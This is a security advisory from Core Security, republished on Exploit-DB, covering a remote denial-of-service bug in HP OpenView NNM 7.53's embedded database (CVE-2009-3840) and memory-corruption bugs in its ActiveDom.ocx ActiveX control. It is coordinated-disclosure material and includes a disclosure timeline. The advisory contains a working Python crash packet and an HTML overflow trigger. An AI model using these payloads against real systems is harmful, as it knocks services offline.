HP OpenView Network Node Manager (OV NNM) 7.53 - Invalid DB Error Code

EDB-ID:

10176




Platform:

Windows

Date:

2009-11-17


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

      Core Security Technologies - CoreLabs Advisory
           http://www.coresecurity.com/corelabs/

  HP Openview NNM 7.53 Invalid DB Error Code vulnerability



1. *Advisory Information*

Title: HP Openview NNM 7.53 Invalid DB Error Code vulnerability
Advisory Id: CORE-2009-0814
Advisory URL:
http://www.coresecurity.com/content/openview_nnm_internaldb_dos
Date published: 2009-11-17
Date of last update: 2009-11-17
Vendors contacted: HP
Release mode: Coordinated release


2. *Vulnerability Information*

Class: External Initialization of Trusted Variables [CWE-454]
Impact: Denial of Service
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: N/A
CVE Name: CVE-2009-3840


3. *Vulnerability Description*

HP Openview Network Node Manager is one of the most widely-deployed
network monitoring and management platforms used throughout enterprise
organizations today. The platform includes many server and client-side
core components with a long list of previously disclosed security bugs.
In this case, a remotely exploitable vulnerability was found in the
database server core component used by NNM. Exploitation of the bug does
not require authentication and will lead to a remotely triggered denial
of service of the internal database service.


4. *Vulnerable packages*

   . HP Openview NNM 7.53

Other versions may be vulnerable but were not tested. Refer to the
vendor's security bulletin for a full list.


5. *Non-vulnerable packages*

Refer to the vendor's security bulletin.


6. *Vendor Information, Solutions and Workarounds*

The vendor issued security bulletin HPSBMA02477 SSRT090177 to address
the problem and provide fixes. It is available at
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01926980

The database service of HP Openview Network Node Manager is remotely
accessible on port 2690/tcp. Restricting or blocking access to that port
will prevent exploitation but may prevent normal operation of Openview NNM.


7. *Credits*

This vulnerability was discovered and researched by Damian Frizza from
Core Security Technologies.


8. *Technical Description / Proof of Concept Code*


8.1. *HP Openview NNM 7.53 Embedded DB Remote Denial Of Service*

HP Openview Network Node Manager includes an embedded database engine
service that is enabled by default and accepts remote connections on
port 2690/tcp. The service is implemented by the 'ovdbrun.exe' which is
started automatically on boot. For certain transactions upon receiving a
packet from the network the service will attempt to determine and
display an error code string based on an error code number specified in
the packet. By sending a specifically crafted packet with an invalid
error code number it is possible to remotely trigger an exception that
forces abnormal termination of the service. It is unlikely that the bug
could be exploited for anything other than a remote denial of service.

The following code excerpt explains the problem:

/-----
005FED51   MOVZX EDX,BYTE PTR SS:[ESP+2]     #FCFF
005FED56   MOVSX ECX,WORD PTR SS:[ESP+3]
005FED5B   CMP ECX,-1
005FED5E   MOVSX EAX,WORD PTR SS:[ESP+5]     #FCFF
005FED63   MOV DWORD PTR DS:[ESI+10],EDX
005FED66   MOV EDX,DWORD PTR SS:[ESP+7]
005FED6A   MOV DWORD PTR DS:[ESI+14],ECX
005FED6D   MOV DWORD PTR DS:[ESI+18],EAX
005FED70   MOV DWORD PTR DS:[ESI+C],EDX
005FED73   JGE SHORT ovdbrun.005FED7E
005FED75   CMP EAX,-1
005FED78   JGE SHORT ovdbrun.005FED7E
005FED7A   CMP ECX,EAX
005FED7C   JE SHORT ovdbrun.005FED83
005FED7E   MOV EAX,1
005FED83   ADD ESP,0C
005FED86   RETN

- -----/

The code above checks for an error condition based on the value of an
Error Code field in the inbound network packet. An error condition is
explicitly handled if the Error Code value is less or equal than -1 in
which case a MessageBox with a corresponding descriptive error string
will be presented to the user. However by crafting a packet with any
negative value in the Error Code field different that -1 the lookup for
the corresponding error string will fail triggering a non-recoverable
error and thus terminating the server process.

The following python code can be used to reproduce the bug:

/-----
#!python
import socket
import struct

a =  struct.pack('<b', 2)
a += struct.pack('<H', 0)
a += struct.pack('<H',0xFEFF)
a += struct.pack('<H',0xFEFF)
a += "1234"

target_ip = 'X.X.X.X'

s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect ((target_ip, 2690))

s.send(a)
s.close()

- -----/



8.2. *Additional information: Low severity bugs in ActiveDom.ocx ActiveX*

The ActiveX control 'ActiveDom.ocx' is shipped with HP Openview NNM 7.53
and installed by default. The control is prone to multiple memory
corruption bugs due to erroneous handling of overly long strings passed
to multiple methods. These bugs are considered of low severity because
the control is not configured as Safe for Scripting or Safe for
Initialization [1] and therefore cannot be exploited without explicit
user consent. Since the control was reported by the vendor as not used
nor required by any component of OpenView NNM, finding deployed systems
with security configuration settings changed to allow exploitation of
these bugs is very unlikely. Nonetheless information about them is
included below for the purpose of completeness in the documentation of
this advisory.

Some of the ActiveX control's methods with implementation flaws are:

/-----
DisplayName(str)
AddGroup(str)
InstallComponent(str)
Subscribe(str, str, int)

- -----/

The following excerpt from method DisplayName() demonstrates the problem:

/-----
2000D408   MOV DWORD PTR SS:[EBP-4],-1
2000D40F   JMP SHORT ACTIVE~1.2000D3D6
2000D411   MOV EAX,ACTIVE~1.200361A0
2000D416   JMP <JMP.&MSVCRT.__CxxFrameHandler>
2000D41B   MOV EAX,ACTIVE~1.2000D4A8
2000D420   CALL <JMP.&MSVCRT._EH_prolog>
2000D425   SUB ESP,10
2000D428   PUSH EBX
2000D429   PUSH ESI
2000D42A   PUSH EDI
2000D42B   MOV DWORD PTR SS:[EBP-10],ESP
2000D42E   MOV DWORD PTR SS:[EBP-14],ECX
2000D431   XOR EBX,EBX
2000D433   MOV DWORD PTR SS:[EBP-4],EBX
2000D436   LEA ESI,DWORD PTR DS:[ECX+28]
2000D439   MOV ECX,DWORD PTR DS:[ESI]        ; ESI = 00038178
2000D43B   MOV EAX,DWORD PTR DS:[ECX]        ;
2000D43D   CALL DWORD PTR DS:[EAX+48]        ;

- -----/

The following HTML code can be used to trigger the bug:

/-----
<html>
<object classid='clsid:A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE' id='target'

    </object>

<script>
a = ""
for (i = 0; i < 10000; i++)
   a = a + "A"
target.DisplayName(a)
</script>
</html>


- -----/



9. *Report Timeline*

. 2009-08-12:
Core Security Technologies notifies the HP Software Security Response
Team (SSRT) of the vulnerability and preliminary schedule to publish the
corresponding security advisory on September 8th 2009. Core asks for
acknowledgement of the email within 2 working days and whether HP SSRT
prefers to receive the technical description of the bug encrypted or in
plaintext.

. 2009-08-12:
HP SSRT asks Core to send the technical description of the vulnerability
encrypted using the PGP key with id 0x08B83D45.

. 2009-08-14:
Core Security Technologies sends technical details encrypted to HP SSRT.

. 2009-08-18:
HP SSRT informs Core that HP engineering have been notified and will
notify Core when they have a schedule estimate. SSRT assigned the IDs
SSRT090177 and SSRT090178 to the vulnerabilities reported by Core.

. 2009-08-27:
Core requests a status update from HP SSRT.

. 2009-08-27:
HP SSRT informs Core that the vulnerabilities are in third-party code
and that the third-party vendor has been notified but there isn't a
schedule for fixes yet. HP SSRT indicates that it is sure HP will not
have a solution ready by September 7th.

. 2009-08-27:
Core informs the HP team that the publication was re-scheduled to
September 21st and requests an update to continue coordinating the
release of fixes and publication of the advisory as soon as possible.

. 2009-08-28:
The HP team informs Core that the third party if planning a release on
October 30th for the first vulnerability. SSRT also notes that ActiveX
vulnerabilities are still being investigated.

. 2009-08-31:
Core Security Technologies acknowledges the information sent by HP SSRT.

. 2009-09-01:
The HP team communicates that they will inform Core Security
Technologies when the fix is available.

. 2009-09-04:
Core asks the HP SSRT to map HP's internal IDs to each of the reported
vulnerability.

. 2009-09-04:
The HP SSRT indicates that SSRT090177 corresponds to the embedded
database vulnerability and SSRT090178 to the ActiveX bugs.

. 2009-09-10:
Core Security Technologies notifies HP SSRT that publication of the
advisory has been re-scheduled to October 30th to be able to coordinate
the release with the issuance of fixes by the third party vendor and
that if non-third-party vulnerabilities (the ActiveX bugs) could be
fixed earlier they would be described in a separate advisory.

. 2009-09-11:
HP SSRT says that it will send any new information to Core on the
ActiveX bugs if they have something to publish before October 30th.

. 2009-09-21:
The HP team informs Core that they are having some problems reproducing
the ActiveX vulnerabilities reported. The NNM engineers have used the
provided proof-of-concept exploit but did not see any effect. SSRT asks
if an overflow was confirmed, if process failure was detected and if a
debugger or a different procedure was used.

. 2009-09-21:
Core Security Technologies notifies the HP SSRT that the proof of
concept crash can be observed using a classic debugger or a just-in-time
debugger that is attached only after an abnormal exception is detected.
Core also sends HP SSRT another proof of concept HTML code that crashes
the ActiveX and can be observed without the need of a debugger.

. 2009-09-22:
The HP team acknowledges previous email from Core with the new PoC to
reproduce the crashes without a debugger.

. 2009-10-06:
Core requests a status update from the SSRT noting that it hasn't
received any update since September 22nd. The advisory is still
scheduled for publication on October 30th and Core is waiting for
confirmation that the ActiveX bugs were reproduced and the fix for them
could be published earlier separately.

. 2009-10-09:
SSRT updates indicating that fixes from the third party for SSRT090177
have been received and HP is currently in the process of testing them on
all platforms expecting an update by October 16th. The ActiveX bugs have
been reproduced and HP determined that the vulnerable control is not
necessary for NNM. HP will recommend customers to set the kill bit for
the control (clsid:A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE) as workaround.

. 2009-10-19:
Core requests a status update and confirmation that HP will be ready to
release fixes by October 30th. Core asks if fixes will be issued for all
vulnerable versions of NNM, whether the fixes or patches will remove the
unnecessary ActiveX control or just ask customers to implement the
workaround. Core requests the complete lists of vulnerable versions and
platforms of NNM and asks if the patches will include fixes to other
bugs. Also, Core notes that the vendor of the third party component has
been identified and that since the bug may affect other products Core
will start a separate vulnerability report process directly with that
vendor.

. 2009-11-02:
Email from Core asking for a status update and an acknowledgement and
response to the questions from the previous email. Core notes that the
previously agreed publication date for the advisory has already passed
without any update from HP. The publication date has been unilaterally
moved to Wednesday November 4th. 2009 and is considered final pending a
response from HP.

. 2009-11-03:
Response from HP SSRT stating that there is not an estimated release
date for patches to some platforms. With regards to the ActiveX bugs, a
security bulletin will be published on November 9th recommending setting
the kill bit.

. 2009-11-03:
Core indicates that since there isn't an estimated patch release date
for missing platforms the advisory will be published on November 9th and
will include guidance on how to implement workarounds for both problems.
Core asks SSRT about the potential impact of blocking or restricting
access to the vulnerable service as a workaround.

. 2009-11-05:
SSRT suggests that given that Core advisory will be published earlier
than HP's security bulletin it should have workarounds for all platforms
and not just for the ones that may not have a patch available
afterwards. HP is still investigating the impact of blocking or
restricting access to the vulnerable port. SSRT asks if Core wants any
acknowledgement in its security bulletin

. 2009-11-05:
Core asks what is the planned publication date for HP's bulletin and
requests that the bulletin credits the discoverer (Damian Frizza).
Provided that the estimated date for publishing the bulletin is not
unreasonable Core would rather schedule the publication of the advisory
to match HP's.

. 2009-11-06:
SSRT informs that their estimate is to have hotfixes available
internally by November 13th and released along with the corresponding
security bulletins by November 17th. SSRT ask whether CVE numbers should
be assigned by HP or provided by Core.

. 2009-11-06:
Core re-schedules publication to November 17th. Core asks SSRT to assign
the CVE numbers.

. 2009-11-12:
HP SSRT reports that the ActiveX control is not marked as safe for
scripting or safe for initialization by default and thus the buffer
overflows in its methods do not seem to be security issues. Asks if Core
still considers them security vulnerabilities.

. 2009-11-16:
HP SSRT provides the CVE id assigned to the denial of service bug.
Indicates that the vendor's security bulletin will not suggest any
workarounds as the effect of blocking or restricting access to the
vulnerable service has not been determined.

. 2009-11-16:
Core confirms that the ActiveX control is not marked as safe for
scripting or initialization which greatly diminishes the relevance of
the reported bugs. Nonetheless, the information about the bugs will be
included in the advisory for the purpose of completeness and to let
users verify, and if necessary correct, the control's configuration
settings. Core still recommends the vendor to remove the unnecessary
control from installation packages and fix the reported bugs to avoid
potential introduction of flaws if it becomes a used control in the
future or should an alternative exploitation vector be found.

. 2009-11-17:
Publication of HP Security Bulletin SSRT090177.

. 2009-11-17:
Advisory CORE-2009-0814 published.



10. *References*

[1] Safe Initialization and Scripting for ActiveX Controls.
http://msdn.microsoft.com/en-us/library/aa751977(VS.85).aspx
[2] How to stop an ActiveX control from running in Internet Explorer.
http://support.microsoft.com/kb/240797


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAksDICYACgkQyNibggitWa2//ACdFpN6SK4B59Iza5Nq88oASfat
YhoAn24UcNlJ/lpKv4brl4d6mctKfwMF
=cR49
-----END PGP SIGNATURE-----